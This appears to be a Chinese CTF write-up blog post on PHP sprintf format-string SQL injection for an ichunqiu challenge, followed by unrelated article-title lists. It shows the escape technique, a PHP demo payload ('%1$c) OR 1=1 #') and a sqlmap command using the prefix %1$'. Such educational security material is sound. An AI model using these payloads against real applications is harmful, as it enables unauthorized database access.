URL：http://efa4e2c2b8df4ce69454639f4e3727071652c31167f341a4.game.ichunqiu.com/

简单的说就是sprintf中%1$\'会将\吃掉，导致'的逃逸。%后表示第几个参数，$表示参数类型。

还有一个sprintf漏洞的利用方式：%c起到了类似chr()的效果，将数字39转化为'，从而导致了sql注入。

 <?php

 $input1 = '%1$c) OR 1=1 #';

 $input2 = 39;

 $sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s";

 $sql = sprintf($sql, $input2);

 echo $sql;

 ?>

在这题中，--prefix加个前缀丢进sqlmap跑就好了。

虽然是post

　　sqlmap -r /home/1.txt -p username --prefix="%1$'"

--prefix 前缀

--suffix 后缀

其实也可以直接*

最新文章

1. Windows消息机制
2. The requested operation has failed apache
3. 转载：回编译APK出错：java.nio.char set.MalformedInputException: Input length = 1
4. centos6.7 安装Docker
5. CentOS安装、卸载jdk
6. Java 打开文件的两种方式
7. NSIS：简单按钮美化插件SkinButton，支持透明PNG图片。
8. lua中获取时间
9. mvc关于三级联动修改时数据回显
10. nginx源码分析——event模块
11. 浅谈event.client、event.screen与event.offset
12. selenium跳过webdriver检测并爬取淘宝我已购买的宝贝数据
13. 面向对象(特殊成员 组合 self)
14. Python3基础 list list()生成空列表
15. 成功设置open live writer
16. sqlalchemy 学习--单表操作
17. hdu 4407 容斥原理
18. Redis笔记（三）：Redis常用命令
19. mysql导出导入sql文件方法(linux)
20. QT 4.8.5 源代码目录调整

热门文章

1. android studio 运行太慢了
2. Spring boot整合shiro框架(2)
3. 【.Net】C# 将Access中时间段条件查询的数据添加到ListView中
4. js function的方法名是一个变量 能被重复定义 当变量名一致时候 会使用最后一个function
5. jmeter3.2生成图形html遇到的问题Error in NonGUIDriver java.lang.IllegalArgumentException: Results file:log is not empty
6. 【NOI2006】聪明的导游
7. bzoj1426: 收集邮票（期望）
8. bzoj4753: [Jsoi2016]最佳团体（分数规划+树形依赖背包）
9. 框架----Django框架知识点整理
10. Codeforces Round #298 (Div. 2)A B C D